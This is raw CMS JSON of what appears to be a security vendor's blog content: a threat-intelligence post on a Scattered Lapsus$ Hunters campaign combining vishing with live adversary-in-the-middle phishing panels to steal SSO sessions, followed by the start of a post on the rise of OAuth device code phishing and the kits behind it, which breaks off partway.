They offer to help the employee set up passkeys for logging into the enterprise SSO service, tricking the victim into visiting a specially crafted adversary-in-the-middle phishing site that captures their SSO credentials, MFA codes, and ultimately live session access. ",[],{},{"nodeType":1258,"data":3177,"content":3178},{},[3179],{"nodeType":1257,"value":3180,"marks":3181,"data":3182},"Once an account is stolen, the attacker logs in to the SSO dashboard to see which platforms they have access to and then proceeds to steal data from them — with the ultimate goal of extorting victims. ",[],{},{"nodeType":1307,"data":3184,"content":3185},{},[],{"nodeType":1311,"data":3187,"content":3188},{},[3189],{"nodeType":1257,"value":3190,"marks":3191,"data":3193},"What we know",[3192],{"type":1318},{},{"nodeType":1258,"data":3195,"content":3196},{},[3197,3201,3210],{"nodeType":1257,"value":3198,"marks":3199,"data":3200},"To date, ",[],{},{"nodeType":1364,"data":3202,"content":3204},{"uri":3203},"https://www.silentpush.com/blog/slsh-alert/",[3205],{"nodeType":1257,"value":3206,"marks":3207,"data":3209},"100+ companies have been targeted",[3208],{"type":1372},{},{"nodeType":1257,"value":3211,"marks":3212,"data":3213},", with infrastructure and domains impersonating their brand to be used in legit-looking campaigns against them. The reality is that the list of targets could be more extensive, and will continue to increase over time. ",[],{},{"nodeType":1258,"data":3215,"content":3216},{},[3217,3221,3229],{"nodeType":1257,"value":3218,"marks":3219,"data":3220},"SLH ",[],{},{"nodeType":1364,"data":3222,"content":3223},{"uri":1696},[3224],{"nodeType":1257,"value":3225,"marks":3226,"data":3228},"claims to be using data stolen in previous breaches",[3227],{"type":1372},{},{"nodeType":1257,"value":3230,"marks":3231,"data":3232},", such as the widespread Salesforce data theft attacks reported in 2025, to identify and contact employees. 
This data includes phone numbers, job titles, names, and other details used to make the social engineering calls more convincing.",[],{},{"nodeType":1258,"data":3234,"content":3235},{},[3236,3240,3245,3249,3254,3258,3263],{"nodeType":1257,"value":3237,"marks":3238,"data":3239},"The group recently relaunched its Tor data leak site, which currently lists breaches at ",[],{},{"nodeType":1257,"value":3241,"marks":3242,"data":3244},"Betterment",[3243],{"type":1318},{},{"nodeType":1257,"value":3246,"marks":3247,"data":3248}," (20 million records containing PII), ",[],{},{"nodeType":1257,"value":3250,"marks":3251,"data":3253},"Crunchbase",[3252],{"type":1318},{},{"nodeType":1257,"value":3255,"marks":3256,"data":3257}," (2 million records containing PII), and ",[],{},{"nodeType":1257,"value":3259,"marks":3260,"data":3262},"SoundCloud",[3261],{"type":1318},{},{"nodeType":1257,"value":3264,"marks":3265,"data":3266}," (30 million records containing PII). ",[],{},{"nodeType":1335,"data":3268,"content":3272},{"target":3269},{"sys":3270},{"id":3271,"type":1340,"linkType":1341},"5scKHYJJleNklGAXNKVc7b",[],{"nodeType":1307,"data":3274,"content":3275},{},[],{"nodeType":1311,"data":3277,"content":3278},{},[3279],{"nodeType":1257,"value":3280,"marks":3281,"data":3283},"What’s new?",[3282],{"type":1318},{},{"nodeType":1468,"data":3285,"content":3286},{},[3287],{"nodeType":1257,"value":3288,"marks":3289,"data":3291},"The best of both worlds? Vishing + AiTM phishing",[3290],{"type":1318},{},{"nodeType":1258,"data":3293,"content":3294},{},[3295],{"nodeType":1257,"value":3296,"marks":3297,"data":3298},"SLH and threat actors affiliated with “The Com” are no strangers to voice phishing (vishing) or the use of MFA-bypassing Attacker-in-the-Middle (AiTM) phishing kits. 
",[],{},{"nodeType":1258,"data":3300,"content":3301},{},[3302,3305,3313],{"nodeType":1257,"value":31,"marks":3303,"data":3304},[],{},{"nodeType":1364,"data":3306,"content":3307},{"uri":3158},[3308],{"nodeType":1257,"value":3309,"marks":3310,"data":3312},"SLH and its precursor groups",[3311],{"type":1372},{},{"nodeType":1257,"value":3314,"marks":3315,"data":3316}," leveraged vishing to great success in the form of help desk impersonation and password/MFA reset attacks as seen in the high-profile Marks & Spencer, Co-Op, and Jaguar Land Rover attacks in 2025, as well as the Caesars and MGM attacks in 2023. MFA-bypassing phishing techniques have also long been a part of their arsenal, from the 2022 0ktapus phishing campaign to more recent use of modern AiTM phishing kits. ",[],{},{"nodeType":1258,"data":3318,"content":3319},{},[3320],{"nodeType":1257,"value":3321,"marks":3322,"data":3323},"But until now, we haven’t seen them used together. ",[],{},{"nodeType":1335,"data":3325,"content":3328},{"target":3326},{"sys":3327},{"id":1454,"type":1340,"linkType":1341},[],{"nodeType":1335,"data":3330,"content":3334},{"target":3331},{"sys":3332},{"id":3333,"type":1340,"linkType":1341},"1IDsaYD3H5MjvPS4ekcUhU",[],{"nodeType":1258,"data":3336,"content":3337},{},[3338],{"nodeType":1257,"value":3339,"marks":3340,"data":3341},"It makes sense to combine these methods. AiTM phishing kits are flexible, highly customizable, and can be used to target a broad range of apps — including all of the major IdP platforms used for SSO. Vishing, on the other hand, is proven to increase the effectiveness of social engineering attacks when performed by an effective operator — which SLH are proven to be (helped by predominantly native English speakers making up their membership, along with the use of effective voice phishing tools). 
",[],{},{"nodeType":1258,"data":3343,"content":3344},{},[3345],{"nodeType":1257,"value":3346,"marks":3347,"data":3348},"Both vishing and AiTM phishing are identity-first methods that consciously evade traditional security tools and detection controls at the endpoint and network layer. This makes them highly effective in today’s IT environment. ",[],{},{"nodeType":1468,"data":3350,"content":3351},{},[3352],{"nodeType":1257,"value":3353,"marks":3354,"data":3356},"A new kind of operator-driven AiTM kit",[3355],{"type":1318},{},{"nodeType":1258,"data":3358,"content":3359},{},[3360],{"nodeType":1257,"value":3361,"marks":3362,"data":3363},"Another unique part about this campaign is that it uses a “live phishing panel” — i.e. a customizable phishing page controlled by the attacker in real time. This enables attackers to dynamically change what a victim sees on a phishing site while speaking to them on the phone. This allows them to guide victims through each step of the login and MFA authentication process.",[],{},{"nodeType":1258,"data":3365,"content":3366},{},[3367],{"nodeType":1257,"value":3368,"marks":3369,"data":3370},"This is principally to increase the victim’s likelihood of engaging with the phishing page. As you can see in the image below, there are several options that can be presented to the victim — including not just the normal phishing stages of entering credentials and passing MFA checks, but also post-compromise actions (e.g. creating a passkey that would then be controlled by the attacker for persistent access even if an account password is reset). ",[],{},{"nodeType":1335,"data":3372,"content":3376},{"target":3373},{"sys":3374},{"id":3375,"type":1340,"linkType":1341},"73Y2n3tRkGFtfhrA2AVJyv",[],{"nodeType":1258,"data":3378,"content":3379},{},[3380],{"nodeType":1257,"value":3381,"marks":3382,"data":3383},"At the end of the authentication flow, the threat actor can choose to redirect their target to a “support ticket\" closure screen. 
This allows the threat actor to manually terminate the session once the compromise is complete while providing the targeted user with context that matches the \"IT support\" ruse. This further reduces the likelihood of post-hoc reporting by a suspicious victim.",[],{},{"nodeType":1258,"data":3385,"content":3386},{},[3387,3391,3400],{"nodeType":1257,"value":3388,"marks":3389,"data":3390},"Given that this modular, operator-controlled phishing kit is reportedly available “",[],{},{"nodeType":1364,"data":3392,"content":3394},{"uri":3393},"https://www.okta.com/blog/threat-intelligence/phishing-kits-adapt-to-the-script-of-callers/",[3395],{"nodeType":1257,"value":3396,"marks":3397,"data":3399},"as a service",[3398],{"type":1372},{},{"nodeType":1257,"value":3401,"marks":3402,"data":3403},"” for criminals, we should expect to see much more of this in future. ",[],{},{"nodeType":1468,"data":3405,"content":3406},{},[3407],{"nodeType":1257,"value":3408,"marks":3409,"data":3411},"0ktapus 2.0?",[3410],{"type":1318},{},{"nodeType":1258,"data":3413,"content":3414},{},[3415],{"nodeType":1257,"value":3416,"marks":3417,"data":3418},"As we mentioned earlier, Scattered Spider made their reputation launching phishing attacks against Okta accounts in the 2022 0ktapus campaign. ",[],{},{"nodeType":1258,"data":3420,"content":3421},{},[3422],{"nodeType":1257,"value":3423,"marks":3424,"data":3425},"The vast majority of phishing attacks target IdP accounts because of the widespread access to downstream apps they grant via SSO. 
",[],{},{"nodeType":1258,"data":3427,"content":3428},{},[3429,3433,3442],{"nodeType":1257,"value":3430,"marks":3431,"data":3432},"This comes at the same time as ",[],{},{"nodeType":1364,"data":3434,"content":3436},{"uri":3435},"https://www.bleepingcomputer.com/news/security/fake-lastpass-emails-pose-as-password-vault-backup-alerts/",[3437],{"nodeType":1257,"value":3438,"marks":3439,"data":3441},"attackers running campaigns to target LastPass master passwords",[3440],{"type":1372},{},{"nodeType":1257,"value":3443,"marks":3444,"data":3445},". This provides a similar level of access to apps in the form of credentials (and sometimes saved passkeys). ",[],{},{"nodeType":1335,"data":3447,"content":3451},{"target":3448},{"sys":3449},{"id":3450,"type":1340,"linkType":1341},"1vyu5WvdktTnC24TkVFqfs",[],{"nodeType":1258,"data":3453,"content":3454},{},[3455,3459,3468],{"nodeType":1257,"value":3456,"marks":3457,"data":3458},"Not only is this a goldmine for attackers looking to steal data or pivot to other systems to be able to launch further attacks (e.g. pivoting to cloud and on-prem services for ransomware deployment) but it’s a nightmare for incident responders. If an attacker can access an app and create a backdoor login method (AKA. a ",[],{},{"nodeType":1364,"data":3460,"content":3462},{"uri":3461},"https://pushsecurity.com/blog/ghost-logins-when-forgotten-identities-come-back-to-haunt-you/",[3463],{"nodeType":1257,"value":3464,"marks":3465,"data":3467},"ghost login",[3466],{"type":1372},{},{"nodeType":1257,"value":3469,"marks":3470,"data":3471},") it can be very difficult for a security team to identify and clean them up. ",[],{},{"nodeType":1335,"data":3473,"content":3477},{"target":3474},{"sys":3475},{"id":3476,"type":1340,"linkType":1341},"7tILkroPw9w0WLIo1bVV24",[],{"nodeType":1258,"data":3479,"content":3480},{},[3481],{"nodeType":1257,"value":3482,"marks":3483,"data":3484},"Check out the excerpt from one of our recent webinars below for more information. 
",[],{},{"nodeType":1335,"data":3486,"content":3490},{"target":3487},{"sys":3488},{"id":3489,"type":1340,"linkType":1341},"5IVkapjwLp1Ys14vXagQRD",[],{"nodeType":1307,"data":3492,"content":3493},{},[],{"nodeType":1311,"data":3495,"content":3496},{},[3497],{"nodeType":1257,"value":3498,"marks":3499,"data":3501},"Impact analysis",[3500],{"type":1318},{},{"nodeType":1258,"data":3503,"content":3504},{},[3505],{"nodeType":1257,"value":3506,"marks":3507,"data":3508},"This combination of methods is likely to increase the success of these malicious campaigns as well as reducing the likelihood of detection. ",[],{},{"nodeType":1258,"data":3510,"content":3511},{},[3512,3516,3524],{"nodeType":1257,"value":3513,"marks":3514,"data":3515},"It’s well documented that modern phishing attacks use a wide and ever-expanding range of ",[],{},{"nodeType":1364,"data":3517,"content":3519},{"uri":3518},"https://pushsecurity.com/blog/phishing-detection-evasion-launch/",[3520],{"nodeType":1257,"value":2684,"marks":3521,"data":3523},[3522],{"type":1372},{},{"nodeType":1257,"value":3525,"marks":3526,"data":3527}," — from implementing legitimate bot protection technologies to prevent analysis, to only loading pages if the correct parameters are met — such as coming through a specific URL redirect path, and adhering to “normal” browser configs (excluding unusual browser window sizes and the presence of security analysis tools).",[],{},{"nodeType":1258,"data":3529,"content":3530},{},[3531],{"nodeType":1257,"value":3532,"marks":3533,"data":3534},"In this case, the malicious payload will only trigger in the event that the delivery is approved by an operator in real time. This means that anyone attempting to find and proactively block a phishing page based on indicators of known-bad is going to have a tough time finding and flagging them. 
If you haven’t got a community of security analysts sharing and tagging samples of malicious pages, it makes it really hard to find and block them at scale before they hit a victim. And if these convincing attacks aren’t being reported, they’re even less likely to be investigated. This is what we mean when we say that most phishing attacks today are effectively zero-day. ",[],{},{"nodeType":1258,"data":3536,"content":3537},{},[3538,3542,3547,3551,3560],{"nodeType":1257,"value":3539,"marks":3540,"data":3541},"In this case, it’s worth pointing out that the phone call is essentially the delivery vector for the phishing page. This means there’s no email to intercept and analyse. This isn’t new — ",[],{},{"nodeType":1257,"value":3543,"marks":3544,"data":3546},"non-email vectors now account for more than 1 in 3 phishing attacks intercepted by Push",[3545],{"type":1318},{},{"nodeType":1257,"value":3548,"marks":3549,"data":3550},", ",[],{},{"nodeType":1364,"data":3552,"content":3554},{"uri":3553},"https://pushsecurity.com/blog/2025-top-phishing-trends/",[3555],{"nodeType":1257,"value":3556,"marks":3557,"data":3559},"LinkedIn and Google Search being the top culprits",[3558],{"type":1372},{},{"nodeType":1257,"value":3561,"marks":3562,"data":3563},". This effectively cuts out the primary phishing detection surface for most organizations.",[],{},{"nodeType":1258,"data":3565,"content":3566},{},[3567],{"nodeType":1257,"value":3568,"marks":3569,"data":3570},"All this means that unless you’re able to detect and block these attacks in real time, organizations will find themselves unable to counter this evolving threat. ",[],{},{"nodeType":1258,"data":3572,"content":3573},{},[3574],{"nodeType":1257,"value":3575,"marks":3576,"data":3578},"The best/only way to do that is to be in the browser. 
",[3577],{"type":1318},{},{"nodeType":1307,"data":3580,"content":3581},{},[],{"nodeType":1311,"data":3583,"content":3584},{},[3585],{"nodeType":1257,"value":3586,"marks":3587,"data":3589},"How Push stops the attack",[3588],{"type":1318},{},{"nodeType":1258,"data":3591,"content":3592},{},[3593],{"nodeType":1257,"value":3594,"marks":3595,"data":3596},"As a browser-based detection and response tool, Push is perfectly positioned to detect and block attacks like this in real-time. ",[],{},{"nodeType":1258,"data":3598,"content":3599},{},[3600],{"nodeType":1257,"value":3601,"marks":3602,"data":3603},"Push harnesses deep browser telemetry to detect and block phishing based on behaviors, not static indicators. By analyzing how phishing pages behave and how users interact with them, Push uncovers fake pages, attempted credential theft, and phishing kits the moment they load in the browser — regardless of the delivery mechanism, and even when the attack has never been seen before. ",[],{},{"nodeType":1335,"data":3605,"content":3609},{"target":3606},{"sys":3607},{"id":3608,"type":1340,"linkType":1341},"2TAKFM1rpETq4KtTY3FPIs",[],{"nodeType":1258,"data":3611,"content":3612},{},[3613],{"nodeType":1257,"value":3614,"marks":3615,"data":3616},"Push's browser-based controls include:",[],{},{"nodeType":1884,"data":3618,"content":3619},{},[3620,3641],{"nodeType":1888,"data":3621,"content":3622},{},[3623],{"nodeType":1258,"data":3624,"content":3625},{},[3626,3629,3637],{"nodeType":1257,"value":31,"marks":3627,"data":3628},[],{},{"nodeType":1364,"data":3630,"content":3632},{"uri":3631},"https://pushsecurity.com/blog/introducing-sso-password-protection/",[3633],{"nodeType":1257,"value":3634,"marks":3635,"data":3636},"Fingerprinting high-risk app passwords",[],{},{"nodeType":1257,"value":3638,"marks":3639,"data":3640}," so they can only be used on a specific domain. Any attempt to reuse this password elsewhere (such as on a phishing site) results in the attempt being blocked. 
",[],{},{"nodeType":1888,"data":3642,"content":3643},{},[3644],{"nodeType":1258,"data":3645,"content":3646},{},[3647,3650,3658],{"nodeType":1257,"value":31,"marks":3648,"data":3649},[],{},{"nodeType":1364,"data":3651,"content":3653},{"uri":3652},"https://pushsecurity.com/blog/detecting-and-blocking-phishing-attacks-in-the-browser/",[3654],{"nodeType":1257,"value":3655,"marks":3656,"data":3657},"Multiple browser-based checks",[],{},{"nodeType":1257,"value":3659,"marks":3660,"data":3661}," looking for indicators of bad, such as cloned elements from legitimate websites, and an ever-growing number of detections relating to phishing kit behaviors and attributes as they are rendered on a page. ",[],{},{"nodeType":1335,"data":3663,"content":3667},{"target":3664},{"sys":3665},{"id":3666,"type":1340,"linkType":1341},"4ESxxjTjNwNXGEW4DBcMVV",[],{"nodeType":1258,"data":3669,"content":3670},{},[3671],{"nodeType":1257,"value":3672,"marks":3673,"data":3674},"Because Push observes every login made in the browser, you can also use Push to find identities susceptible to phishing attacks, such as those not using phishing-resistant authentication methods (e.g. passkeys), to proactively improve your account hygiene and reduce your attack surface. ",[],{},{"nodeType":1258,"data":3676,"content":3677},{},[3678,3682,3691,3695,3703],{"nodeType":1257,"value":3679,"marks":3680,"data":3681},"Finally, you can also use our ",[],{},{"nodeType":1364,"data":3683,"content":3685},{"uri":3684},"https://pushsecurity.com/blog/employee-identity-verification-codes-release/",[3686],{"nodeType":1257,"value":3687,"marks":3688,"data":3690},"employee verification codes",[3689],{"type":1372},{},{"nodeType":1257,"value":3692,"marks":3693,"data":3694}," feature as part of a layered defense — a simple, browser-based identity check that gives your employees a reliable way to confirm they’re talking to another employee from your organization. 
It enables employees to quickly verify that a caller is who they say they are by relaying a rotating 6-digit verification code displayed in every employee's browser via the Push extension. This is an effective way of combating ",[],{},{"nodeType":1364,"data":3696,"content":3697},{"uri":1804},[3698],{"nodeType":1257,"value":3699,"marks":3700,"data":3702},"help desk scams",[3701],{"type":1372},{},{"nodeType":1257,"value":3704,"marks":3705,"data":3706}," too — another favorite of SLH. ",[],{},{"nodeType":1335,"data":3708,"content":3712},{"target":3709},{"sys":3710},{"id":3711,"type":1340,"linkType":1341},"1TEpCjh8UGwmejgYSGC1by",[],{"nodeType":3714,"data":3715,"content":3716},"blockquote",{},[3717],{"nodeType":1258,"data":3718,"content":3719},{},[3720,3724,3732,3735,3743,3747,3754],{"nodeType":1257,"value":3721,"marks":3722,"data":3723},"Want to learn more about Push? ",[],{},{"nodeType":1364,"data":3725,"content":3726},{"uri":2228},[3727],{"nodeType":1257,"value":3728,"marks":3729,"data":3731},"Check out our latest product overview",[3730],{"type":1372},{},{"nodeType":1257,"value":3548,"marks":3733,"data":3734},[],{},{"nodeType":1364,"data":3736,"content":3738},{"uri":3737},"https://pushsecurity.com/product-demo/",[3739],{"nodeType":1257,"value":3740,"marks":3741,"data":3742},"visit our demo library",[],{},{"nodeType":1257,"value":3744,"marks":3745,"data":3746},", or ",[],{},{"nodeType":1364,"data":3748,"content":3749},{"uri":2241},[3750],{"nodeType":1257,"value":2244,"marks":3751,"data":3753},[3752],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":3755,"data":3756},[],{},{"nodeType":1258,"data":3758,"content":3759},{},[3760],{"nodeType":1257,"value":31,"marks":3761,"data":3762},[],{},"Unpacking the latest SLH campaign — combining vishing with AiTM phishing to hijack SSO accounts","Analysing the latest Scattered Lapsus$ Hunters (SLH) phishing campaign targeting hundreds of 
organizations.\n","2026-01-28T00:00:00.000Z","unpacking-the-latest-slh-campaign",{"items":3768},[3769,3771],{"sys":3770,"name":1270},{"id":1269},{"sys":3772,"name":1274},{"id":1273},{"items":3774},[3775],{"fullName":2265,"firstName":2266,"jobTitle":2267,"profilePicture":3776},{"url":2269},{"items":3778},[3779],{"fullName":3138,"firstName":3139,"jobTitle":3140,"profilePicture":3780},{"url":3142},{"json":3782,"links":6364},{"nodeType":1259,"data":3783,"content":3784},{},[3785,3805,3824,3831,3837,3844,3851,3854,3862,3868,3952,3972,3978,3985,4114,4117,4125,4132,4138,4141,4149,4190,4196,4203,4210,4217,4224,4242,4248,4254,4260,4266,4272,4278,4284,4290,4557,4560,4568,4703,4709,4712,4720,4854,4860,4863,4871,5018,5024,5027,5035,5176,5182,5185,5193,5340,5346,5349,5357,5503,5509,5512,5520,5615,5621,5624,5632,5726,5732,5735,5743,5749,5882,5888,5898,5901,5909,5921,5928,5934,5941,5962,5978,5984,5992,6018,6025,6031,6038,6041,6049,6057,6078,6099,6104,6111,6118,6126,6142,6149,6169,6172,6180,6187,6194,6241,6247,6254,6257,6265,6272,6279,6299,6305,6312,6320,6327],{"nodeType":1258,"data":3786,"content":3787},{},[3788,3792,3801],{"nodeType":1257,"value":3789,"marks":3790,"data":3791},"The OAuth 2.0 ",[],{},{"nodeType":1364,"data":3793,"content":3795},{"uri":3794},"https://www.rfc-editor.org/rfc/rfc8628",[3796],{"nodeType":1257,"value":3797,"marks":3798,"data":3800},"device authorization grant",[3799],{"type":1372},{},{"nodeType":1257,"value":3802,"marks":3803,"data":3804}," was designed to enable input-constrained devices to sign-in to apps by asking the user to complete the login on a separate device by entering a code. But today, it’s mainly used when accessing CLI tools, meaning that many users encounter the device code flow daily. 
",[],{},{"nodeType":1258,"data":3806,"content":3807},{},[3808,3811,3820],{"nodeType":1257,"value":31,"marks":3809,"data":3810},[],{},{"nodeType":1364,"data":3812,"content":3814},{"uri":3813},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/device_code_phishing/description.md",[3815],{"nodeType":1257,"value":3816,"marks":3817,"data":3819},"Device code phishing",[3818],{"type":1372},{},{"nodeType":1257,"value":3821,"marks":3822,"data":3823}," attacks designed to exploit this authorization flow are not new — it was among the first techniques that we added to the SaaS attacks matrix back in 2023. But it’s taken until now for it to really enter mainstream adoption. ",[],{},{"nodeType":1258,"data":3825,"content":3826},{},[3827],{"nodeType":1257,"value":3828,"marks":3829,"data":3830},"The technique tricks a user into issuing access tokens for an attacker-controlled application (not a device, confusingly). Any app that supports device code logins can be a target. Popular examples include Microsoft, Google, Salesforce, GitHub, and AWS. That said, Microsoft is, as always, much more heavily targeted at scale now than any other app.",[],{},{"nodeType":1335,"data":3832,"content":3836},{"target":3833},{"sys":3834},{"id":3835,"type":1340,"linkType":1341},"Al0pGH8vmOYiufDFiAbt0",[],{"nodeType":1258,"data":3838,"content":3839},{},[3840],{"nodeType":1257,"value":3841,"marks":3842,"data":3843},"We’ve always been surprised that attackers haven’t commonly used device code phishing in their standard toolkit, preferring session-stealing AiTM phishing and other social engineering attacks like ClickFix. But it’s pretty clear from the recent data that the shift to mainstream adoption has now happened. 
",[],{},{"nodeType":1258,"data":3845,"content":3846},{},[3847],{"nodeType":1257,"value":3848,"marks":3849,"data":3850},"In this blog post, we’ll explore the history of device code phishing, what’s changed for it to enter mainstream adoption, how it works under the hood (with recent examples), and what security teams can do about it. ",[],{},{"nodeType":1307,"data":3852,"content":3853},{},[],{"nodeType":1311,"data":3855,"content":3856},{},[3857],{"nodeType":1257,"value":3858,"marks":3859,"data":3861},"A brief history of device code phishing",[3860],{"type":1318},{},{"nodeType":1335,"data":3863,"content":3867},{"target":3864},{"sys":3865},{"id":3866,"type":1340,"linkType":1341},"6u3DgvSGChtTJu7l9I7PG1",[],{"nodeType":1258,"data":3869,"content":3870},{},[3871,3875,3884,3888,3897,3901,3910,3914,3923,3927,3936,3939,3948],{"nodeType":1257,"value":3872,"marks":3873,"data":3874},"The technique was first documented in 2020, before Secureworks released the first tooling framework ",[],{},{"nodeType":1364,"data":3876,"content":3878},{"uri":3877},"https://github.com/secureworks/PhishInSuits",[3879],{"nodeType":1257,"value":3880,"marks":3881,"data":3883},"PhishInSuits",[3882],{"type":1372},{},{"nodeType":1257,"value":3885,"marks":3886,"data":3887}," a year later. 
A host of research followed, including ",[],{},{"nodeType":1364,"data":3889,"content":3891},{"uri":3890},"https://github.com/secureworks/squarephish",[3892],{"nodeType":1257,"value":3893,"marks":3894,"data":3896},"SquarePhish",[3895],{"type":1372},{},{"nodeType":1257,"value":3898,"marks":3899,"data":3900}," v1 (using QR codes to trigger the 15 minute code expiration window), Dirk-Jan Mollema’s ",[],{},{"nodeType":1364,"data":3902,"content":3904},{"uri":3903},"https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/",[3905],{"nodeType":1257,"value":3906,"marks":3907,"data":3909},"key research",[3908],{"type":1372},{},{"nodeType":1257,"value":3911,"marks":3912,"data":3913}," (chaining device code phishing via Microsoft apps into Primary Refresh Token (PRT) acquisition to gain full browser-level access) and Dennis Kniep’s ",[],{},{"nodeType":1364,"data":3915,"content":3917},{"uri":3916},"https://github.com/denniskniep/DeviceCodePhishing",[3918],{"nodeType":1257,"value":3919,"marks":3920,"data":3922},"DeviceCodePhishing tool",[3921],{"type":1372},{},{"nodeType":1257,"value":3924,"marks":3925,"data":3926}," which automates the entire flow with a headless browser. (Other recent noteworthy tools include ",[],{},{"nodeType":1364,"data":3928,"content":3930},{"uri":3929},"https://github.com/nromsdahl/squarephish2",[3931],{"nodeType":1257,"value":3932,"marks":3933,"data":3935},"SquarePhish2",[3934],{"type":1372},{},{"nodeType":1257,"value":1703,"marks":3937,"data":3938},[],{},{"nodeType":1364,"data":3940,"content":3942},{"uri":3941},"https://github.com/praetorian-inc/GitPhish",[3943],{"nodeType":1257,"value":3944,"marks":3945,"data":3947},"GitPhish",[3946],{"type":1372},{},{"nodeType":1257,"value":3949,"marks":3950,"data":3951},", so shout out to those too). 
",[],{},{"nodeType":1258,"data":3953,"content":3954},{},[3955,3959,3968],{"nodeType":1257,"value":3956,"marks":3957,"data":3958},"It wasn’t until August 2024 that in-the-wild exploitation was first identified, with Russia-linked campaigns then continuing into 2025 before entering mainstream criminal adoption. This trend has continued to gather momentum in 2026 with ",[],{},{"nodeType":1364,"data":3960,"content":3962},{"uri":3961},"https://thehackernews.com/2026/03/device-code-phishing-hits-340-microsoft.html",[3963],{"nodeType":1257,"value":3964,"marks":3965,"data":3967},"EvilTokens",[3966],{"type":1372},{},{"nodeType":1257,"value":3969,"marks":3970,"data":3971},", the first reported criminal PhaaS kit for device code phishing, already powering massive campaigns after launching in February. ",[],{},{"nodeType":1335,"data":3973,"content":3977},{"target":3974},{"sys":3975},{"id":3976,"type":1340,"linkType":1341},"6xsfmbYEzpW7CdDiNzO6cu",[],{"nodeType":1258,"data":3979,"content":3980},{},[3981],{"nodeType":1257,"value":3982,"marks":3983,"data":3984},"Some of the noteworthy in-the-wild campaigns include:",[],{},{"nodeType":1884,"data":3986,"content":3987},{},[3988,4020,4040],{"nodeType":1888,"data":3989,"content":3990},{},[3991],{"nodeType":1258,"data":3992,"content":3993},{},[3994,3998,4005,4008,4016],{"nodeType":1257,"value":3995,"marks":3996,"data":3997},"Storm-2372, tracked by 
",[],{},{"nodeType":1364,"data":3999,"content":4001},{"uri":4000},"https://www.microsoft.com/en-us/security/blog/2025/02/13/storm-2372-conducts-device-code-phishing-campaign/",[4002],{"nodeType":1257,"value":2027,"marks":4003,"data":4004},[],{},{"nodeType":1257,"value":1703,"marks":4006,"data":4007},[],{},{"nodeType":1364,"data":4009,"content":4011},{"uri":4010},"https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/",[4012],{"nodeType":1257,"value":4013,"marks":4014,"data":4015},"Volexity",[],{},{"nodeType":1257,"value":4017,"marks":4018,"data":4019},", linked to multiple Russia-aligned clusters, combining spear-phishing and social engineering with device code phishing payloads against strategic intelligence targets.",[],{},{"nodeType":1888,"data":4021,"content":4022},{},[4023],{"nodeType":1258,"data":4024,"content":4025},{},[4026,4030,4036],{"nodeType":1257,"value":4027,"marks":4028,"data":4029},"The massive Salesforce campaign operated by ",[],{},{"nodeType":1364,"data":4031,"content":4032},{"uri":3158},[4033],{"nodeType":1257,"value":3161,"marks":4034,"data":4035},[],{},{"nodeType":1257,"value":4037,"marks":4038,"data":4039}," (SLH) combined vishing with a device code phishing payload targeting Salesforce. The attacks morphed into a broader supply chain campaign using stolen credentials, ultimately resulting in 1000+ organizations being compromised and over 1.5 billion stolen records claimed. ",[],{},{"nodeType":1888,"data":4041,"content":4042},{},[4043],{"nodeType":1258,"data":4044,"content":4045},{},[4046,4050,4058,4062,4071,4075,4084,4088,4097,4101,4110],{"nodeType":1257,"value":4047,"marks":4048,"data":4049},"A massive spike in activity in late 2025 and 2026. 
This includes ",[],{},{"nodeType":1364,"data":4051,"content":4053},{"uri":4052},"https://www.proofpoint.com/us/blog/threat-insight/access-granted-phishing-device-code-authorization-account-takeover",[4054],{"nodeType":1257,"value":4055,"marks":4056,"data":4057},"multiple threat clusters",[],{},{"nodeType":1257,"value":4059,"marks":4060,"data":4061}," tracked using device code phishing techniques, more ",[],{},{"nodeType":1364,"data":4063,"content":4065},{"uri":4064},"https://www.bleepingcomputer.com/news/security/hackers-target-microsoft-entra-accounts-in-device-code-vishing-attacks/",[4066],{"nodeType":1257,"value":4067,"marks":4068,"data":4070},"criminal operations linked to SLH",[4069],{"type":1372},{},{"nodeType":1257,"value":4072,"marks":4073,"data":4074},", and ",[],{},{"nodeType":1364,"data":4076,"content":4078},{"uri":4077},"https://newtonpaul.com/blog/device-code-phish-update/",[4079],{"nodeType":1257,"value":4080,"marks":4081,"data":4083},"hundreds of organizations being targeted via PhaaS architecture,",[4082],{"type":1372},{},{"nodeType":1257,"value":4085,"marks":4086,"data":4087}," which looks to be the same campaign as the recently uncovered EvilTokens PhaaS reported by ",[],{},{"nodeType":1364,"data":4089,"content":4091},{"uri":4090},"https://www.huntress.com/blog/railway-paas-m365-token-replay-campaign",[4092],{"nodeType":1257,"value":4093,"marks":4094,"data":4096},"Huntress",[4095],{"type":1372},{},{"nodeType":1257,"value":4098,"marks":4099,"data":4100}," (featuring abuse of the Railway PaaS platform). 
Abnormal has also reported on a closed-source PhaaS kit called ",[],{},{"nodeType":1364,"data":4102,"content":4104},{"uri":4103},"https://abnormal.ai/blog/venom-phishing-campaign-mfa-credential-theft",[4105],{"nodeType":1257,"value":4106,"marks":4107,"data":4109},"Venom",[4108],{"type":1372},{},{"nodeType":1257,"value":4111,"marks":4112,"data":4113}," that offers device code phishing capabilities that appear visually and functionally similar to EvilTokens.   ",[],{},{"nodeType":1307,"data":4115,"content":4116},{},[],{"nodeType":1311,"data":4118,"content":4119},{},[4120],{"nodeType":1257,"value":4121,"marks":4122,"data":4124},"What we’re seeing in the wild",[4123],{"type":1318},{},{"nodeType":1258,"data":4126,"content":4127},{},[4128],{"nodeType":1257,"value":4129,"marks":4130,"data":4131},"As mentioned, we’ve also seen a huge spike in device code phishing activity this year, with multiple kits, page designs, and lure types. We’ve identified 10 distinct kits in circulation in the wild, with EvilTokens being the most prevalent. It’s clear that attackers are both spinning up their own kits and creative derivatives of others — we’ve seen kits that are visually similar to EvilTokens (close enough to be clones or forks) but with very different backends, for example AWS, Digital Ocean, 2cloud, and more. 
